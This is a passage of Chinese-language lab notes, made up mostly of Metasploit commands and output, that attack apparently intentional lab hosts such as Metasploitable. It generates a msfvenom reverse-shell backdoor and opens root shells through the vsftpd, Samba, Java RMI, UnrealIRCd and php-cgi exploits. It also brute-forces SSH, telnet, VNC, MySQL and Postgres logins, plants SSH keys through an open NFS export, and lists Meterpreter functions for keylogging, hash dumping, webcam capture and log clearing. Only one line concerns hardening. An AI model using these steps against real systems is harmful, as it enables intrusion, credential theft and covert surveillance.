TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 444
TCP 192.168.2.208:49926 52.231.199.126:443 TIME_WAIT 0
TCP 192.168.2.208:49938 192.168.2.200:9999 ESTABLISHED 4652查看运行程序
C:\Users\Administrator\Desktop>tasklist |findstr winshell
tasklist |findstr winshell
winshell.exe 4652 Console 1 1,888 KLinux后门
设置payload reverse_tcp
set payload linux/x64/meterpreter/reverse_tcp开启监听
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.2.200:6666 生成后门
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.2.200 LPORT=6666 -f elf > mshell.elf反弹shell
[*] Sending stage (3020772 bytes) to 192.168.2.195
[*] Meterpreter session 4 opened (192.168.2.200:6666 -> 192.168.2.233:41812 ) at 2022-07-13 05:53:49 -0400
meterpreter >
meterpreter > sysinfo
Computer : 192.168.2.233
OS : Ubuntu 20.04 (Linux 5.15.0-41-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > ifconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : ens33
Hardware MAC : 00:0c:29:5f:88:e7
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.2.233
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::7a92:8c02:6e42:766f
IPv6 Netmask : ffff:ffff:ffff:ffff::
查看网络连接
meterpreter > netstat -antpl
Connection list
===============
Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 0.0.0.0:9080 0.0.0.0:* LISTEN 0 0
tcp 127.0.0.1:5445 0.0.0.0:* LISTEN 0 0
tcp 127.0.0.1:5538 0.0.0.0:* LISTEN 0 0
tcp 0.0.0.0:22 0.0.0.0:* LISTEN 0 0
tcp 127.0.0.53:53 0.0.0.0:* LISTEN 101 0
tcp 192.168.2.233:55232 192.168.2.200:6666 ESTABLISHED 0 0
tcp 127.0.0.1:37494 127.0.0.1:8090 ESTABLISHED 0 0
ftp后门
目标服务器:Linux,漏洞服务:VSFTPD 2.3.4,俗称笑脸漏洞
nmap扫描端口版本
msf6 > db_nmap -sS -sV 192.168.2.219
[*] Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-13 21:07 EDT
[*] Nmap: Nmap scan report for 192.168.2.219
[*] Nmap: Host is up (0.0026s latency).
[*] Nmap: Not shown: 977 closed tcp ports (reset)
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 25/tcp open smtp Postfix smtpd
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
设置后门脚本vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > hosts 192.168.2.219 -R
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.2.219 00:0c:29:b0:76:35 Linux server
RHOSTS => 192.168.2.219
exploit运行
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.2.219:21 - The port used by the backdoor bind listener is already open
[+] 192.168.2.219:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.反弹shell
[*] Command shell session 1 opened (192.168.2.200:40547 -> 192.168.2.219:6200 ) at 2022-07-13 21:11:04 -0400
id
uid=0(root) gid=0(root)
whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux加固方法
vim /etc/vsftpd.conf
将local_enable = YES改为local_enable=NO入侵
nmap 扫描端口
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.2.219 21 tcp ftp open vsftpd 2.3.4
192.168.2.219 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.2.219 23 tcp telnet open Linux telnetd
192.168.2.219 25 tcp smtp open Postfix smtpd
192.168.2.219 53 tcp domain open ISC BIND 9.4.2
192.168.2.219 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.2.219 111 tcp rpcbind open 2 RPC #100000
192.168.2.219 139 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.2.219 445 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.2.219 512 tcp exec open netkit-rsh rexecd
192.168.2.219 513 tcp login open OpenBSD or Solaris rlogind
192.168.2.219 514 tcp tcpwrapped open
192.168.2.219 1099 tcp java-rmi open GNU Classpath grmiregistry
192.168.2.219 1524 tcp bindshell open Metasploitable root shell
192.168.2.219 2049 tcp nfs open 2-4 RPC #100003
192.168.2.219 2121 tcp ftp open ProFTPD 1.3.1
192.168.2.219 3306 tcp mysql open 5.0.51a-3ubuntu5
192.168.2.219 3632 tcp open
192.168.2.219 5432 tcp postgresql open PostgreSQL DB 8.3.0 - 8.3.7
192.168.2.219 5900 tcp vnc open VNC protocol 3.3
192.168.2.219 6000 tcp x11 open access denied
192.168.2.219 6667 tcp irc open UnrealIRCd
192.168.2.219 6697 tcp open
192.168.2.219 8009 tcp ajp13 open Apache Jserv Protocol v1.3
192.168.2.219 8180 tcp http open Apache Tomcat/Coyote JSP engine 1.1
192.168.2.219 8787 tcp open
ssh 爆破
设置脚本ssh_login
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /root/Desktop/passwd.txt
pass_file => /root/Desktop/passwd.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file /root/Desktop/username.txt
user_file => /root/Desktop/username.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.2.219
rhosts => 192.168.2.219运行爆破
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 192.168.2.219:22 - Starting bruteforce
[+] 192.168.2.219:22 - Success: 'root:qwer' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] SSH session 1 opened (192.168.2.200:35807 -> 192.168.2.219:22 ) at 2022-07-13 21:34:32 -0400
[+] 192.168.2.219:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] SSH session 2 opened (192.168.2.200:38467 -> 192.168.2.219:22 ) at 2022-07-13 21:34:41 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
telnet爆破
设置脚本telnet_login
msf6 auxiliary(scanner/telnet/telnet_login) > set rhosts 192.168.2.219
rhosts => 192.168.2.219
msf6 auxiliary(scanner/telnet/telnet_login) > set user_file /root/Desktop/username.txt
user_file => /root/Desktop/username.txt
msf6 auxiliary(scanner/telnet/telnet_login) > set pass_file /root/Desktop/passwd.txt
pass_file => /root/Desktop/passwd.txt运行爆破
msf6 auxiliary(scanner/telnet/telnet_login) > run
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: kali:admin (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: kali:password (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: kali:Admin@123 (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: kali:qwer (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: kali:msfadmin (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: guest:admin (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: guest:password (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: guest:Admin@123 (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: guest:qwer (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: guest:msfadmin (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: root:admin (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: root:password (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: root:Admin@123 (Incorrect: )
[+] 192.168.2.219:23 - 192.168.2.219:23 - Login Successful: root:qwer
[*] 192.168.2.219:23 - Attempting to start session 192.168.2.219:23 with root:qwer
[*] Command shell session 3 opened (192.168.2.200:40915 -> 192.168.2.219:23 ) at 2022-07-13 21:48:00 -0400vnc爆破
设置脚本vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > setg pass_file /root/Desktop/passwd.txt
pass_file => /root/Desktop/passwd.txt
msf6 auxiliary(scanner/vnc/vnc_login) > setg user_file /root/Desktop/username.txt
user_file => /root/Desktop/username.txt
msf6 auxiliary(scanner/vnc/vnc_login) > setg rhosts 192.168.2.219
rhosts => 192.168.2.219
msf6 auxiliary(scanner/vnc/vnc_login) > run
[*] 192.168.2.219:5900 - 192.168.2.219:5900 - Starting VNC login sweep
[-] 192.168.2.219:5900 - 192.168.2.219:5900 - LOGIN FAILED: :admin (Incorrect: Authentication failed)
[+] 192.168.2.219:5900 - 192.168.2.219:5900 - Login Successful: :password
[-] 192.168.2.219:5900 - 192.168.2.219:5900 - LOGIN FAILED: :Admin@123 (Incorrect: Authentication failed)
[-] 192.168.2.219:5900 - 192.168.2.219:5900 - LOGIN FAILED: :qwer (Incorrect: Authentication failed)
vncviewer登录
vncviewer 192.168.2.219samba3.0命令执行
设置脚本usermap_script
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.2.219 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.200 yes The listen address (an interface may be specified)
LPORT 9999 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
反弹shell
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 192.168.2.200:9999
[*] Command shell session 5 opened (192.168.2.200:9999 -> 192.168.2.219:60259 ) at 2022-07-13 22:07:05 -0400
id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
netstat -antpl
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN 5032/xinetd
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN 5032/xinetd
tcp 0 0 192.168.2.219:23 192.168.2.200:37609 ESTABLISHED 5586/in.telnetd: 19
tcp 0 0 192.168.2.219:60259 192.168.2.200:9999 ESTABLISHED 5698/nc
tcp 1 0 192.168.2.219:139 192.168.2.200:32987 CLOSE_WAIT 5694/smbd
mysql爆破
设置脚本mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE /root/Desktop/passwd.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.2.219 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 3306 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /root/Desktop/username.txt no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts爆破
msf6 auxiliary(scanner/mysql/mysql_login) > run
[+] 192.168.2.219:3306 - 192.168.2.219:3306 - Found remote MySQL version 5.0.51a
[+] 192.168.2.219:3306 - 192.168.2.219:3306 - Success: 'root:'
[-] 192.168.2.219:3306 - 192.168.2.219:3306 - LOGIN FAILED: kali: (Incorrect: Access denied for user 'kali'@'192.168.2.200' (using password: NO))
[+] 192.168.2.219:3306 - 192.168.2.219:3306 - Success: 'guest:'
[-] 192.168.2.219:3306 - 192.168.2.219:3306 - LOGIN FAILED: msfadmin: (Incorrect: Access denied for user 'msfadmin'@'192.168.2.200' (using password: NO))
[-] 192.168.2.219:3306 - 192.168.2.219:3306 - LOGIN FAILED: msfadmin:admin (Incorrect: Access denied for user 'msfadmin'@'192.168.2.200' (using password: YES))postgresql爆破
设置脚本postgres_login
msf6 auxiliary(scanner/postgres/postgres_login) > show options
Module options (auxiliary/scanner/postgres/postgres_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DATABASE template1 yes The database to authenticate against
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user
, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE none no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS 192.168.2.219 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Us
ing-Metasploit
RPORT 5432 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE /usr/share/metasploit-framework/data/wordl no File containing (space-separated) users and passwords, one pair per line
ists/postgres_default_userpass.txt
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /root/Desktop/username.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
运行爆破
msf6 auxiliary(scanner/postgres/postgres_login) > run
[-] 192.168.2.219:5432 - LOGIN FAILED: kali:admin@template1 (Incorrect: Invalid username or password)
[-] 192.168.2.219:5432 - LOGIN FAILED: kali:password@template1 (Incorrect: Invalid username or password)
[-] 192.168.2.219:5432 - LOGIN FAILED: kali:Admin@123@template1 (Incorrect: Invalid username or password)
[-] 192.168.2.219:5432 - LOGIN FAILED: kali:qwer@template1 (Incorrect: Invalid username or password)
[-] 192.168.2.219:5432 - LOGIN FAILED: admin:qwer@template1 (Incorrect: Invalid username or password)
[-] 192.168.2.219:5432 - LOGIN FAILED: admin:msfadmin@template1 (Incorrect: Invalid username or password)
[+] 192.168.2.219:5432 - Login Successful: postgres:postgres@template1
[-] 192.168.2.219:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
java-rmi命令执行
设置脚本java_rmi_server
msf6 exploit(multi/misc/java_rmi_server) > show options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS 192.168.2.219 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1099 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to lis
ten on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.200 yes The listen address (an interface may be specified)
LPORT 9999 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
反弹shell
msf6 exploit(multi/misc/java_rmi_server) > run
[*] Started reverse TCP handler on 192.168.2.200:9999
[*] 192.168.2.219:1099 - Using URL: http://192.168.2.200:8080/9gVp6zs4tG4
[*] 192.168.2.219:1099 - Server started.
[*] 192.168.2.219:1099 - Sending RMI Header...
[*] 192.168.2.219:1099 - Sending RMI Call...
[*] 192.168.2.219:1099 - Replied to request for payload JAR
[*] Sending stage (58829 bytes) to 192.168.2.219
[*] Meterpreter session 6 opened (192.168.2.200:9999 -> 192.168.2.219:54492 ) at 2022-07-13 22:25:28 -0400
meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Architecture : x86
System Language : en_US
Meterpreter : java/linux
meterpreter > cat /proc/version
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008unrealircd
设置脚本unreal_ircd_3281_backdoor
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.2.219 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 6667 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target设置payload
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
1 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
2 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
3 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
4 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
5 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
6 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
7 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
8 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
9 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
10 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
11 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload 5
payload => cmd/unix/reverse
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.2.219 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 6667 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.200 yes The listen address (an interface may be specified)
LPORT 8888 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
植入后门反弹shell
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP double handler on 192.168.2.200:8888
[*] 192.168.2.219:6667 - Connected to 192.168.2.219:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.2.219:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo St9Ner5x99Zbppzs;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "St9Ner5x99Zbppzs\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 7 opened (192.168.2.200:8888 -> 192.168.2.219:59310 ) at 2022-07-13 22:33:04 -0400
id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
netstat -antpl |grep 8888
tcp 0 0 192.168.2.219:59310 192.168.2.200:8888 ESTABLISHED 5818/telnet
tcp 0 0 192.168.2.219:59311 192.168.2.200:8888 ESTABLISHED 5822/telnet nfs配置错误
探测服务
###################查看目标主机上NFS服务是否开启######################
# rpcinfo -p 192.168.2.219
program vers proto port service
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 37285 status
100024 1 tcp 43521 status
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100021 1 udp 45555 nlockmgr
100021 3 udp 45555 nlockmgr
100021 4 udp 45555 nlockmgr
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100021 1 tcp 45972 nlockmgr
100021 3 tcp 45972 nlockmgr
100021 4 tcp 45972 nlockmgr
100005 1 udp 54845 mountd
100005 1 tcp 35085 mountd
100005 2 udp 54845 mountd
100005 2 tcp 35085 mountd
100005 3 udp 54845 mountd
100005 3 tcp 35085 mountd
###############显示指定的远程共享目录列表####################
# showmount -e 192.168.2.219
Export list for 192.168.2.219:
/ *
生成rsa公钥
ssh-keygen挂载远程nfs
########################生成本地目录###########################
mkdir /tmp/nfs
####################挂载远程nfs目录到本地目录##################
mount -t nfs 192.168.2.219:/tmp/nfs上传ssh密匙
cat /root/.ssh/id_rsa.pub>>/tmp/nfs/root/.ssh/authorized_keysssh登录
ssh root@192.168.2.219php_cgi参数注入
设置脚本php_cgi_arg_injection
msf6 exploit(multi/http/php_cgi_arg_injection) > show options
Module options (exploit/multi/http/php_cgi_arg_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
PLESK false yes Exploit Plesk
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.2.219 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI no The URI to request (must be a CGI-handled PHP script)
URIENCODING 0 yes Level of URI URIENCODING and padding (0 for minimum)
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.200 yes The listen address (an interface may be specified)
LPORT 9999 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
反弹shell
msf6 exploit(multi/http/php_cgi_arg_injection) > run
[*] Started reverse TCP handler on 192.168.2.200:9999
[*] Sending stage (39860 bytes) to 192.168.2.219
[*] Meterpreter session 8 opened (192.168.2.200:9999 -> 192.168.2.219:58659 ) at 2022-07-13 23:25:52 -0400
meterpreter > shell
Process 5979 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
netstat -antpl | grep 9999
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 192.168.2.219:58659 192.168.2.200:9999 ESTABLISHED 5977/php Meterpreter/post后渗透
Meterpreter是一种先进的,可动态扩展的有效负载,它使用内存中的 DLL注入阶段,并在运行时通过网络扩展。它通过stager套接字进行通信并提供全面的客户端Ruby API。它包含命令历史记录,制表符完成,频道等。
隐身
Meterpreter完全驻留在内存中,并且不向磁盘写任何内容。
由于Meterpreter将自身注入受损的进程并且可以轻松迁移到其他正在运行的进程,因此不会创建新进程。
默认情况下,Meterpreter使用加密通信。
所有这些提供有限的法医证据和对受害者机器的影响。
强大
Meterpreter采用通道化通信系统。
TLV协议有一些限制。
扩展
功能可以在运行时扩充并通过网络加载。
可以将新功能添加到Meterpreter,而无需重新构建它。
添加运行时功能
通过加载扩展将新功能添加到Meterpreter。
客户端通过套接字上载DLL。
在受害者上运行的服务器加载内存中的DLL并对其进行初始化。
新的扩展将自己注册到服务器。
攻击者机器上的客户端加载本地扩展API,现在可以调用扩展功能。
整个过程是无缝的,大约需要1秒钟才能完成。
Core Commands
=============
Command Description
------- -----------
? 帮助文档
background 将当前meterpreter隐藏到后台
bg 同上
bgkill 关闭后台运行的meterpreter脚本
bglist 列出正在运行的meterpreter脚本
bgrun 在后台运行一个meterpreter
channel 通信频道
close 关闭一个通信通道
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit 关闭当前meterpreter会话
get_timeouts 查询当前会话延迟时间
guid 获取当前会话的GUID
help 帮助文档
info 显示某个POST模块(后渗透模块)的帮助信息
irb 在当前会话打开交互式ruby shell
load 加载meterpreter扩展,常用mimikatz,kiwi
machine_id Get the MSF ID of the machine attached to the session
migrate 迁移会话到另一个进程
pivot 建立pivot代理,用于打穿内网
pry Open the Pry debugger on the current session
quit 同exit
read 从某一个通信通道中读取数据
resource 执行在某个文件中存储的命令
run 执行一个meterpreter脚本或者post(后渗透)模块
sessions 快速切换会话
set_timeouts 设置当前会话的延迟时间
sleep 强迫meterpreter静默,然后重新建立连接
transport Change the current transport mechanism
use load的别名
uuid 获取当前会话的uuid
write 向通信通道中写入数据
Stdapi: File system Commands
============================
Command Description
------- -----------
cat 读取文件内容
cd 更改工作目录
checksum 检索文件校验和
cp 复制
dir 显示文件目录,同ls
download 下载文件或目录
edit 编辑文件
getlwd 获取本地工作目录
getwd 获取工作目录
lcd 改变本地工作目录
lls 显示本地文件目录
lpwd 显示本地工作目录
ls 显示文件目录
mkdir 新建文件夹
mv 剪切
pwd 打印当前文件目录
rm 删除文件
rmdir 删除文件夹
search 查找文件
show_mount 列出所有挂载的硬盘
upload 上传
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp 显示主机arp缓存
getproxy 显示当前代理设置
ifconfig 显示网卡信息
ipconfig 显示网卡信息
netstat 显示网络连接
portfwd 端口转发
resolve 解析目标主机上的一组主机名,查找ip地址和主机地址对应关系
route 显示、更改路由表
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev 清空时间日志
drop_token Relinquishes any active impersonation token.
execute 执行命令
getenv 获取环境变量
getpid 获取当前进程id
getprivs 尝试获取更多权限
getsid 获取当前进程的用户id
getuid 获取uid
kill 杀进程
localtime 显示主机当地时间
pgrep 通过进程名称过滤进程
pkill 通过名称杀进程
ps 列出正在运行的进程
reboot 重启远程主机
reg 修改远程主机注册表
rev2self Calls RevertToSelf() on the remote machine
shell 打开远程主机shell
shutdown 关闭远程主机
steal_token Attempts to steal an impersonation token from the target proce
ss
suspend 挂起或唤醒进程
sysinfo 获取主机系统信息
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops 列出所有桌面
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump 键盘监听
keyscan_start 键盘监听
keyscan_stop 键盘监听
screenshot 截屏
setdesktop 改变桌面
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play an audio file on target system, nothing written on disk
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem 尝试提高权限
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump dump ash
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp 操控文件时间戳
meterpreter > sysinfo
Computer : WIN10X64-EDU
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > guid
[+] Session GUID: 17e90d51-0bd2-4293-bab7-284e094f6f12
meterpreter > getuid
Server username: WIN10X64-EDU\Administrator
meterpreter > arp
ARP cache
=========
IP address MAC address Interface
---------- ----------- ---------
169.254.255.255 ff:ff:ff:ff:ff:ff 15
192.168.2.1 08:3a:38:73:31:f9 14
192.168.2.200 00:0c:29:8a:35:c4 14
192.168.2.255 ff:ff:ff:ff:ff:ff 14
224.0.0.22 00:00:00:00:00:00 1
224.0.0.22 01:00:5e:00:00:16 9
224.0.0.22 01:00:5e:00:00:16 15
224.0.0.22 01:00:5e:00:00:16 14
224.0.0.251 01:00:5e:00:00:fb 15
224.0.0.251 01:00:5e:00:00:fb 14
